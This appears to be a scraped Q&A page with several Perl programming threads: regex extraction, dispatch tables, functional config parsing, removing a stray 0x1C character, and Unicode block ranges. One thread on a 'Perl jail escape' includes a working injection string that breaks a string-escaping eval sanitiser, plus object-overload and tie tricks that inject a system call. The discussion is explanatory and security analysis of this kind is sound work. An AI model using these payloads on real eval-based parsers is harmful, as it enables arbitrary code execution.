Perl regex to capture group and stop matching - perl

I need some help with this perl regular expression
s/.*?<\?lsmb if\s*?(\S*)\s*?\?>/$1/
in the code below parsing out some non-whitespace chars [A-Z][a-z][0-9][_] surrounded by any number of whitespace and the other chars. I have tried various Perl regular expressions which are all commented out in the program below.
My main problem I think is stopping matching at the end.
The code below runs 8 tests, and I am hoping to find something that passes all 8.
#!/usr/bin/perl
use strict;
use warnings;
use diagnostics;
my $count = 0;
my $t = 0;
#examples of things I need to match, match => catagory
my $self = { 'customerfax' => 'alpha',
'_____' => 'Underscore',
'000000' => 'numeric',
'letter_reason_4' => 'alfa-numeric-underscore',
'customerphone7' => 'alfa-numeric',
'customer_phone' => 'alfa-underscore',
};
# must contain <?lsmb 'varname from $self' ?>
# may contain any amount of whitespace chars where one is depected
# will end with \n that is removed by chop below
my $test1 = qq|<?lsmb if customerfax ?> caacaacac\n|;
my $test2 = qq|<?lsmb if _____ ?> bbb\n|;
my $test3 = qq|<?lsmb if 000000 ?> cccc\n|;
my $test4 = qq|<?lsmb if letter_reason_4 ?><t \></'><><><>\n|; # /
my $test5 = qq| <?lsmb if customerfax ?> |;
my $test6 = qq|<?lsmb if customerphone7 ?> \<?lsmb ignore this >n|;
my $test7 = qq|<?lsmb if customer_phone ?>\n|;
my $test8 = qq| avcscc 34534534 <?lsmb if letter_reason_4 ?> 0xffff\n|;
strip_markup($test1);
strip_markup($test2);
strip_markup($test3);
strip_markup($test4);
strip_markup($test5);
strip_markup($test6);
strip_markup($test7);
strip_markup($test8);
if ($count == 8) { print "Passed All done\n";}
else { print "All done passed $count out of 8 Try again \n"; }
sub strip_markup {
$_= shift;
#print "strip_markup $_ \n";
if (/<\?lsmb if /) {
chop; # gets rid ot the new line
#original
#s/.*?<\?lsmb if (.+?) \?>/$1/;
#What I have tried:
#s/.*?<\?lsmb if(?:\s)*?(\S+?)(?:\s)*?\?>\b/$1/;
s/.*?<\?lsmb if\s*?(\S*)\s*?\?>/$1/;
#s/.*?<\?lsmb if\s*?([A-Za-z0-9_]*?)\s*?\?>/$1/;
#s/.*?<\?lsmb if[\s]*?(\S*?)[\s]*?\?>/$1/;
#s/.*?<\?lsmb if (\S*?) \?>/$1/;
#s/.*?<\?lsmb if (\S+?) \?>/$1/;
#s/.*?<\?lsmb if ([\S]+?)([\s]+?)\?>/$1/;
#s/.*?<\?lsmb if[\s]+([\S]+)[\s]+\?>/$1/;
#s/.*?<\?lsmb if\s*?([\S]*?)\s*?\?>/$1/;
#s/.*?<\?lsmb if\s+?([\S]+?)[\s]+?\?>/$1/;
#s/.*?<\?lsmb if ([\S]+?) \?>/$1/;
#s/.*?<\?lsmb if\s*?([\S_]*?)\s*?\?>/$1/;
#s/.*?<\?lsmb if\s*?([[a-zA-Z]|[\d]|[_]]*?)\s*?\?>/$1/;
#s/.*?<\?lsmb if\s*?([a-zA-Z\d_]*?)\s*?\?>/$1/;
#s/.*?<\?lsmb if\s*?([^[:space:]]+?)\s*?\?>/$1/;
$t++;
print "Test $t ";
#look up the result as the hash key
my $ok = $self->{$_};
if ($ok) {
$count++;
print "OK passed $ok,";
}
print qq|Test Value : '$_' \n|;
}
}
Here are some of the Tests and what they should return:
Test1 = <?lsmb if customerfax ?> caacaacac\n should return customerfax
Test2 = <?lsmb if _____ ?> bbb\n should return _____
Test8 = avcscc 34534534 <?lsmb if letter_reason_4 ?> 0xffff\n
should return letter_reason_4

If my understanding of your requirements is right, the needed phrase is extracted by simple
my ($match) = $string =~ /<\?lsmb \s+ if \s+ (\w+)/x
In the list context the match operator m// returns a list with matches. Even if it's just one, we need the list context – in the scalar context its behavior is different. The list context comes from assigning to a list from it, my (...) =. The /x modifier merely allows us to use spaces inside, for readability. See perlretut for starters.
What may precede <? doesn't have to be specified, since the pattern matches anywhere in the string. The \w is for [A-Za-z0-9_] (see perlrecharclass), what seems to match your examples and description. The \S is more permissive. Nothing is needed after \w+.
Also, there is no need to first test whether the pattern is there
sub strip_markup
{
my ($test_res) = $_[0] =~ /<\?lsmb if (\w+)/;
if ($test_res) {
# ...
}
return $test_res; # return something!
}
There is no reason for the substitution so we use a match.
I understand that you are working with code you can't change, but would still like to comment
No need to remove the newline here. But when you do that, use chomp and not chop
The sub uses global variables. That can lead to bugs. Declare in small scope. Pass
The sub modifies global variables. That often leads to bugs while there is rarely need for it
Use arrays for repetitions of the same thing
This can be organized differently, to separate work more clearly
For example
my #tests = (
qq|<?lsmb if customerfax ?> caacaacac\n|,
# ...
);
my ($cnt, $t);
foreach my $test (#tests)
{
my $test_res = strip_markup($test);
if (defined $test_res) {
$t++;
print "Test $t ";
#look up the result as the hash key
my $ok = $self->{$test_res};
if ($ok) {
$count++;
print "OK passed $ok,";
}
print qq|Test Value : '$_' \n|;
}
else { } # report failure
}
sub strip_markup {
my ($test_res) = $_[0] =~ /<\?lsmb \s+ if \s+ (\w+)/x;
return $test_res;
}
The defined test of $test_res is to allow for falsey things (like 0 or '') to be valid results.
The reporting code can, and should be, in another subroutine.

Related

Perl jail escape

Given the following Perl code, how could one get code execution if they control $foo?
sub Parse($)
{
my $dataPt = shift;
my (#toks, $tok, $more);
Tok: for (;;) {
# find the next token
last unless $$dataPt =~ /(\S)/sg; # get next non-space character
if ($1 eq '(') { # start of list
$tok = Parse($dataPt);
} elsif ($1 eq ')') { # end of list
$more = 1;
last;
} elsif ($1 eq '"') { # quoted string
$tok = '';
for (;;) {
my $pos = pos($$dataPt);
last Tok unless $$dataPt =~ /"/sg;
$tok .= substr($$dataPt, $pos, pos($$dataPt)-1-$pos);
# we're good unless quote was escaped by odd number of backslashes
last unless $tok =~ /(\\+)$/ and length($1) & 0x01;
print("here\n");
$tok .= '"'; # quote is part of the string
}
# must protect unescaped "$" and "#" symbols, and "\" at end of string
$tok =~ s{\\(.)|([\$\#]|\\$)}{'\\'.($2 || $1)}sge;
# convert C escape sequences (allowed in quoted text)
$tok = eval qq{"$tok"};
} else { # key name
pos($$dataPt) = pos($$dataPt) - 1;
# allow anything in key but whitespace, braces and double quotes
# (this is one of those assumptions I mentioned)
$tok = $$dataPt =~ /([^\s()"]+)/sg ? $1 : undef;
}
push #toks, $tok if defined $tok;
}
# prevent further parsing unless more after this
pos($$dataPt) = length $$dataPt unless $more;
return #toks ? \#toks : undef;
}
$foo = '(test(foo "bar"))';
$ref = \$foo;
ParseAnt $ref;
I believe there is a way to force the parsing function to include an unescaped double quote in the $tok variable before it is processed by eval, but I was not successful in doing so.
I cannot provide more information as this code snippet is used in production.
Edit
Since the (well-meant) changes to the question happened to invalidate an early answer I am adding this note, along with the original version for the reader's convenience (what can be seen under revisions anyway) ---
Original version of this question:
Given the following Perl code, how could one get code execution if they control $str?
my $str = "malicious payload";
die if $str =~ /"/;
$str =~ s{\\(.)|([\$\#]|\\$)}{'\\'.($2 || $1)}sge;
eval qq{"$str"};
You can take advantage of \c to eat an inserted escape character.
\c${ print qq{0wn3d\n}; \'' }
The key code is
$str =~ s{\\(.)|([\$\#]|\\$)}{'\\'.($2 || $1)}sge;
This answer focuses on this as this is all that was provided intially.
There are two ways to inject code:
Closing the string literal.
This would require a literal " in the input, or its production by the validator.
Using a construct that allows code to be embedded.
These are:
$BLOCK
#BLOCK
$NAME[ EXPR ], $NAME->[ EXPR ], $BLOCK[ EXPR ], $$NAME[ EXPR ]
#NAME[ EXPR ], $NAME->#[ EXPR ], #BLOCK[ EXPR ], #$NAME[ EXPR ]
$NAME{ EXPR }, $NAME->{ EXPR }, $BLOCK{ EXPR }, $$NAME{ EXPR }
#NAME{ EXPR }, $NAME->#{ EXPR }, #BLOCK{ EXPR }, #$NAME{ EXPR }
Both EXPR and BLOCK can contain executable code.
There are various ways of getting those sequences into a string.
Fooling the validator into thinking something is already escaped.
Causing an an escape to be treated as something else.
Fooling the validator into escaping what would already escape the sequence.
Through removal of characters from the middle.
Taking advantage of $$ or $\ somehow.
The snippet's intent to is to process \ escapes as Perl would.[1] We can take advantage of \c to eat an escape character. \c eats the next character, so we can use before a $ to each the the validator's attempt to escape the $.
\c${ print qq{0wn3d\n}; \'' }
becomes
"\c\${ print qq{0wn3d\n}; \'' }"
which means
do { print qq{0wn3d\n}; chr(0x1C) }
Kudos to #bananabr for finding \c.
This, in of itself, is surely a bug. Write a parser for your language's escapes.
{ package Jail::Breaker;
use overload
'""' => sub {
my ($self) = #_;
if ($self->[0]++ < 1) {
return $self->[1]
} else {
return qq(";system '$self->[1]';")
}
},
fallback => 1;
sub new {
my ($class, $string) = #_;
bless [0, $string], $class
}
}
my $str = 'Jail::Breaker'->new('ls -la /');
die 'invalid' if $str =~ /"/;
$str =~ s{\\(.)|([\$\#]|\\$)}{'\\'.($2 || $1)}sge;
eval qq{"$str"};
or, similarly,
{ package Jail::Breaker;
use Tie::Scalar;
use parent -norequire => 'Tie::StdScalar';
my $fetched;
sub FETCH {
my ($self) = #_;
if ($fetched++) {
return qq(";system'$$self';")
} else {
return $$self
}
}
}
tie my $str, 'Jail::Breaker', 'ls -la /';
...
Both the solutions use an object which returns something else when read for the first time, and the "evil" string when read later.

How to remove the ASCII code 28 0x1C (FS) from a Perl CGI script?

I have the following code snippet
#trunkarray = split(/:/,$trunkid);
my $compString = "";
foreach $value ( #trunkarray ) {
print "<TR> <TD> $value </TD> </TR>";
if ( ! ($compString) ) {
$compString = "$value";
}
else {
$compString = $compString . ",$value";
}
}
&updateOperation($compString);
The $CompString variable is sent to updateOperation.
My script is giving a special character FS (code point 28 or 0x1C) after the comma , along with $value in the above statement. I found this special character's occurrence when I pasted the output in Notepad++.
Can anyone please tell me the reason why I'm getting this special character, and if there is a way to remove it?
Due to this special character, my database operation (under the updateOperation subroutine) is getting aborted; As this string is passed as an argument for an update operation like this:
sub updateOperation
{
my($trunkgrplist) = #_;
$UPDATE= "update TRUNKGROUP set source='D' where trunkgrpid in ($trunkgrplist)";
..
}
For whatever reason, you have the equivalent of
my $compString = "428331:\x{1C}428332:\x{1C}428333";
You can fix it with
$compString =~ s/\x1C//g;
or
$compString =~ tr/\x1C//d;
Your code becomes
sub updateOperation { # XXX Bad name
my #trunk_grp_ids = #_;
while (#trunk_grp_ids) {
my $trunk_grp_ids_list =
join ', ',
map $dbh->quote($_),
splice(#trunk_grp_ids, 0, 500);
$dbh->do("
UPDATE TRUNKGROUP
SET source='D'
WHERE trunkgrpid in ( $trunk_grp_ids_list )
");
}
}
my $compString = "428331:\x{1C}428332:\x{1C}428333"; # XXX Bad name
$compString =~ tr/\x1C//d;
my #trunk_grp_ids = split /:/, $compString;
updateOperation(#trunk_grp_ids);

functional Perl: Filter, Iterator

I have to write Perl although I'm much more comfortable with Java, Python and functional languages. I'd like to know if there's some idiomatic way to parse a simple file like
# comment line - ignore
# ignore also empty lines
key1 = value
key2 = value1, value2, value3
I want a function that I pass an iterator over the lines of the files and that returns a map from keys to list of values. But to be functional and structured I'd like to:
use a filter that wraps the given iterator and returns an iterator without empty lines or comment lines
The mentioned filter(s) should be defined outside of the function for reusability by other functions.
use another function that is given the line and returns a tuple of key and values string
use another function that breaks the comma separated values into a list of values.
What is the most modern, idiomatic, cleanest and still functional way to do this? The different parts of the code should be separately testable and reusable.
For reference, here is (a quick hack) how I might do it in Python:
re_is_comment_line = re.compile(r"^\s*#")
re_key_values = re.compile(r"^\s*(\w+)\s*=\s*(.*)$")
re_splitter = re.compile(r"\s*,\s*")
is_interesting_line = lambda line: not ("" == line or re_is_comment_line.match(line))
and re_key_values.match(line)
def parse(lines):
interesting_lines = ifilter(is_interesting_line, imap(strip, lines))
key_values = imap(lambda x: re_key_values.match(x).groups(), interesting_lines)
splitted_values = imap(lambda (k,v): (k, re_splitter.split(v)), key_values)
return dict(splitted_values)
A direct translation of your Python would be
my $re_is_comment_line = qr/^\s*#/;
my $re_key_values = qr/^\s*(\w+)\s*=\s*(.*)$/;
my $re_splitter = qr/\s*,\s*/;
my $is_interesting_line= sub {
my $_ = shift;
length($_) and not /$re_is_comment_line/ and /$re_key_values/;
};
sub parse {
my #lines = #_;
my #interesting_lines = grep $is_interesting_line->($_), #lines;
my #key_values = map [/$re_key_values/], #interesting_lines;
my %splitted_values = map { $_->[0], [split $re_splitter, $_->[1]] } #key_values;
return %splitted_values;
}
Differences are:
ifilter is called grep, and can take an expression instead of a block as first argument. These are roughly equivalent to a lambda. The current item is given in the $_ variable. The same applies to map.
Perl doesn't emphazise laziness, and seldomly uses iterators. There are instances where this is required, but usually the whole list is evaluated at once.
In the next example, the following will be added:
Regexes don't have to be precompiled, Perl is very good with regex optimizations.
Instead of extracting key/values with regexes, we use split. It takes an optional third argument that limits the number of resulting fragments.
The whole map/filter stuff can be written in one expression. This doesn't make it more efficient, but emphazises the flow of data. Read the map-map-grep from bottom upwards (actually right to left, think of APL).
.
sub parse {
my %splitted_values =
map { $_->[0], [split /\s*,\s*/, $_->[1]] }
map {[split /\s*=\s*/, $_, 2]}
grep{ length and !/^\s*#/ and /^\s*\w+\s*=\s*\S/ }
#_;
return \%splitted_values; # returning a reference improves efficiency
}
But I think a more elegant solution here is to use a traditional loop:
sub parse {
my %splitted_values;
LINE: for (#_) {
next LINE if !length or /^\s*#/;
s/\A\s*|\s*\z//g; # Trimming the string—omitted in previous examples
my ($key, $vals) = split /\s*=\s*/, $_, 2;
defined $vals or next LINE; # check if $vals was assigned
#{ $splitted_values{$key} } = split /\s*,\s*/, $vals; # Automatically create array in $splitted_values{$key}
}
return \%splitted_values
}
If we decide to pass a filehandle instead, the loop would be replaced with
my $fh = shift;
LOOP: while (<$fh>) {
chomp;
...;
}
which would use an actual iterator.
You could now go and add function parameters, but do this only iff you are optimizing for flexibility and nothing else. I already used a code reference in the first example. You can invoke them with the $code->(#args) syntax.
use Carp; # Error handling for writing APIs
sub parse {
my $args = shift;
my $interesting = $args->{interesting} or croak qq("interesting" callback required);
my $kv_splitter = $args->{kv_splitter} or croak qq("kv_splitter" callback required);
my $val_transform= $args->{val_transform} || sub { $_[0] }; # identity by default
my %splitted_values;
LINE: for (#_) {
next LINE unless $interesting->($_);
s/\A\s*|\s*\z//g;
my ($key, $vals) = $kv_splitter->($_);
defined $vals or next LINE;
$splitted_values{$key} = $val_transform->($vals);
}
return \%splitted_values;
}
This could then be called like
my $data = parse {
interesting => sub { length($_[0]) and not $_[0] =~ /^\s*#/ },
kv_splitter => sub { split /\s*=\s*/, $_[0], 2 },
val_transform => sub { [ split /\s*,\s*/, $_[0] ] }, # returns anonymous arrayref
}, #lines;
I think the most modern approach consists in taking advantage of the CPAN modules. In your example, Config::Properties may helps:
use strict;
use warnings;
use Config::Properties;
my $config = Config::Properties->new(file => 'example.properties') or die $!;
my $value = $config->getProperty('key');
As indicated in the posts linked to by #collapsar, Higher-Order Perl is a great read for exploring functional techniques in Perl.
Here is an example that hits your bullet points:
use strict;
use warnings;
use Data::Dumper;
my #filt_rx = ( qr{^\s*\#},
qr{^[\r\n]+$} );
my $kv_rx = qr{^\s*(\w+)\s*=\s*([^\r\n]*)};
my $spl_rx = qr{\s*,\s*};
my $iterator = sub {
my ($fh) = #_;
return sub {
my $line = readline($fh);
return $line;
};
};
my $filter = sub {
my ($it,#r) = #_;
return sub {
my $line;
do {
$line = $it->();
} while ( defined $line
&& grep { $line =~ m/$_/} #r );
return $line;
};
};
my $kv = sub {
my ($line,$rx) = #_;
return ($line =~ m/$rx/);
};
my $spl = sub {
my ($values,$rx) = #_;
return split $rx, $values;
};
my $it = $iterator->( \*DATA );
my $f = $filter->($it,#filt_rx);
my %map;
while ( my $line = $f->() ) {
my ($k,$v) = $kv->($line,$kv_rx);
$map{$k} = [ $spl->($v,$spl_rx) ];
}
print Dumper \%map;
__DATA__
# comment line - ignore
# ignore also empty lines
key1 = value
key2 = value1, value2, value3
It produces the following hash on the provided input:
$VAR1 = {
'key2' => [
'value1',
'value2',
'value3'
],
'key1' => [
'value'
]
};
you might be interested in this SO question as well as this one.
the following code is a self-contained perl script destined to give you an idea of how to implement in perl (only partially in a functional style; in case you don't revulse seeing the particular coding style and/or language construct, i can refine the solution somewhat).
Miguel Prz is right that in most cases you'd search CPAN for solutions to match your requirements.
my (
$is_interesting_line
, $re_is_comment_line
, $re_key_values
, $re_splitter
);
$re_is_comment_line = qr(^\s*#);
$re_key_values = qr(^\s*(\w+)\s*=\s*(.*)$);
$re_splitter = qr(\s*,\s*);
$is_interesting_line = sub {
my $line = shift;
return (
(!(
!defined($line)
|| ($line eq '')
))
&& ($line =~ /$re_key_values/)
);
};
sub strip {
my $line = shift;
# your implementation goes here
return $line;
}
sub parse {
my #lines = #_;
#
my (
$dict
, $interesting_lines
, $k
, $v
);
#
#$interesting_lines =
grep {
&{$is_interesting_line} ( $_ );
} ( map { strip($_); } #lines )
;
$dict = {};
map {
if ($_ =~ /$re_key_values/) {
($k, $v) = ($1, [split(/$re_splitter/, $2)]);
$$dict{$k} = $v;
}
} #$interesting_lines;
return $dict;
} # parse
#
# sample execution goes here
#
my $parse =<<EOL;
# comment
what = is, this, you, wonder
it = is, perl
EOL
parse ( split (/[\r\n]+/, $parse) );

How to properly call a sub by referencing in Perl

I'm working on a dispatching script. It takes a string with a command, does some cooking to it, and then parses it. But I can't grab a hold into the referencing:
Use::strict;
Use:warnings;
my($contexto, $cmd, $target, $ultpos, #params);
my $do = "echo5 sample string that says stuff ";
$target = "";
$cmd = "";
$_ = "";
# I do some cumbersome string parsing to get the array with
# the exploded string and then call parsear(#command)
sub parsear {
my %operations = (
'echo' => \&echo,
'status' => \&status,
'echo5' => \&echo5,
);
my $op = $_[0];
if ($operations{$op}){
$operations{$op}->(#_);
print "it exists\n";
}
else{
print "incorrect command.\n";
}
}
sub status {
print "correct status.\n";
}
sub echo {
shift(#_);
print join(' ',#_) . "\n";
}
sub echo5 {
shift(#_);
print join(' ',#_) . "\n" x 5;
}
I don't really know what the problem is. If the sub does not exist, it never says "incorrect command", and if I call for example "echo5 hello" it should print out:
hello
hello
hello
hello
hello
But it does nothing.
And when I call echo, it works as expected. What is the explanation?
Note: I'm on the latest version of Strawberry Perl
use strict; # 'use' is a keyword
use warnings;
# All these variables are not needed
sub parsear { # Learn to indent correctly
my %operations = (
'echo' => \&echo,
'status' => \&status,
'echo5' => \&echo5,
);
my $op = shift; # take first element off #_
if ($operations{$op}) {
print "$op exists\n"; # Make your status message useful
$operations{$op}->(#_);
} else {
print "incorrect command: $op\n"; # And your error message
}
}
sub status {
print "correct status.\n";
}
sub echo {
# shift(#_); # This is no longer needed, and now echo can be used as a
# normal subroutine as well as a dispatch target
print join(' ',#_) . "\n";
}
sub echo5 {
# shift(#_); # This is no longer needed
print +(join(' ',#_) . "\n") x 5; # Parentheses are needed since x binds tightly
}
Then running:
parsear 'status';
parsear 'echo', 'hello';
parsear 'echo5', 'hello';
parsear 'an error';
results in:
status exists
correct status.
echo exists
hello
echo5 exists
hello
hello
hello
hello
hello
incorrect command: an error
I am not sure what "cumbersome string parsing" you are doing since you did not include it, but if you are parsing a string like
my $do = "echo5 sample string that says stuff ";
where the command is the first word, and the arguments are the rest, you can either split everything:
parsear split /\s+/, $do;
Or use a regex to cut the first word off:
my ($cmd, $arg) = $do =~ /^(\w+)\s*(.*)/;
parsear $cmd => $arg;
You don’t even need the variables:
parsear $do =~ /^(\w+)\s*(.*)/;
Finally, the echo5 subroutine is a bit more complicated than it needs to be. It could be written as:
sub echo5 {
print "#_\n" x 5; # "#_" means join($", #_) and $" defaults to ' '
}
The x command binds differently from how you were expecting; you probably wanted:
print ((join(' ', #_) . "\n") x 5);
Both extra sets of parentheses seemed to be necessary.

Where can I find an array of the (un)assigned Unicode code points for a particular block?

At the moment, I'm writing these arrays by hand.
For example, the Miscellaneous Mathematical Symbols-A block has an entry in hash like this:
my %symbols = (
...
miscellaneous_mathematical_symbols_a => [(0x27C0..0x27CA), 0x27CC,
(0x27D0..0x27EF)],
...
)
The simpler, 'continuous' array
miscellaneous_mathematical_symbols_a => [0x27C0..0x27EF]
doesn't work because Unicode blocks have holes in them. For example, there's nothing at 0x27CB. Take a look at the code chart [PDF].
Writing these arrays by hand is tedious, error-prone and a bit fun. And I get the feeling that someone has already tackled this in Perl!
Perhaps you want Unicode::UCD? Use its charblock routine to get the range of any named block. If you want to get those names, you can use charblocks.
This module is really just an interface to the Unicode databases that come with Perl already, so if you have to do something fancier, you can look at the lib/5.x.y/unicore/UnicodeData.txt or the various other files in that same directory to get what you need.
Here's what I came up with to create your %symbols. I go through all the blocks (although in this sample I skip that ones without "Math" in their name. I get the starting and ending code points and check which ones are assigned. From that, I create a custom property that I can use to check if a character is in the range and assigned.
use strict;
use warnings;
digest_blocks();
my $property = 'My::InMiscellaneousMathematicalSymbolsA';
foreach ( 0x27BA..0x27F3 )
{
my $in = chr =~ m/\p{$property}/;
printf "%X is %sin $property\n",
$_, $in ? '' : ' not ';
}
sub digest_blocks {
use Unicode::UCD qw(charblocks);
my $blocks = charblocks();
foreach my $block ( keys %$blocks )
{
next unless $block =~ /Math/; # just to make the output small
my( $start, $stop ) = #{ $blocks->{$block}[0] };
$blocks->{$block} = {
assigned => [ grep { chr =~ /\A\p{Assigned}\z/ } $start .. $stop ],
unassigned => [ grep { chr !~ /\A\p{Assigned}\z/ } $start .. $stop ],
start => $start,
stop => $stop,
name => $block,
};
define_my_property( $blocks->{$block} );
}
}
sub define_my_property {
my $block = shift;
(my $subname = $block->{name}) =~ s/\W//g;
$block->{my_property} = "My::In$subname"; # needs In or Is
no strict 'refs';
my $string = join "\n", # can do ranges here too
map { sprintf "%X", $_ }
#{ $block->{assigned} };
*{"My::In$subname"} = sub { $string };
}
If I were going to do this a lot, I'd use the same thing to create a Perl source file that has the custom properties already defined so I can just use them right away in any of my work. None of the data should change until you update your Unicode data.
sub define_my_property {
my $block = shift;
(my $subname = $block->{name}) =~ s/\W//g;
$block->{my_property} = "My::In$subname"; # needs In or Is
no strict 'refs';
my $string = num2range( #{ $block->{assigned} } );
print <<"HERE";
sub My::In$subname {
return <<'CODEPOINTS';
$string
CODEPOINTS
}
HERE
}
# http://www.perlmonks.org/?node_id=87538
sub num2range {
local $_ = join ',' => sort { $a <=> $b } #_;
s/(?<!\d)(\d+)(?:,((??{$++1})))+(?!\d)/$1\t$+/g;
s/(\d+)/ sprintf "%X", $1/eg;
s/,/\n/g;
return $_;
}
That gives me output suitable for a Perl library:
sub My::InMiscellaneousMathematicalSymbolsA {
return <<'CODEPOINTS';
27C0 27CA
27CC
27D0 27EF
CODEPOINTS
}
sub My::InSupplementalMathematicalOperators {
return <<'CODEPOINTS';
2A00 2AFF
CODEPOINTS
}
sub My::InMathematicalAlphanumericSymbols {
return <<'CODEPOINTS';
1D400 1D454
1D456 1D49C
1D49E 1D49F
1D4A2
1D4A5 1D4A6
1D4A9 1D4AC
1D4AE 1D4B9
1D4BB
1D4BD 1D4C3
1D4C5 1D505
1D507 1D50A
1D50D 1D514
1D516 1D51C
1D51E 1D539
1D53B 1D53E
1D540 1D544
1D546
1D54A 1D550
1D552 1D6A5
1D6A8 1D7CB
1D7CE 1D7FF
CODEPOINTS
}
sub My::InMiscellaneousMathematicalSymbolsB {
return <<'CODEPOINTS';
2980 29FF
CODEPOINTS
}
sub My::InMathematicalOperators {
return <<'CODEPOINTS';
2200 22FF
CODEPOINTS
}
Maybe this?
my #list =
grep {chr ($_) =~ /^\p{Assigned}$/}
0x27C0..0x27EF;
#list = map { $_ = sprintf ("%X", $_ )} #list;
print "#list\n";
Gives me
27C0 27C1 27C2 27C3 27C4 27C5 27C6 27C7 27C8 27C9 27CA 27D0 27D1 27D2 27D3
27D4 27D5 27D6 27D7 27D8 27D9 27DA 27DB 27DC 27DD 27DE 27DF 27E0 27E1 27E2
27E3 27E4 27E5 27E6 27E7 27E8 27E9 27EA 27EB
I don't know why you wouldn't say miscellaneous_mathematical_symbols_a => [0x27C0..0x27EF], because that's how the Unicode standard is defined according to the PDF.
What do you mean when you say it doesn't "work"? If it's giving you some sort of error when you check the existence of the character in the block, then why not just weed them out of the block when your checker comes across an error?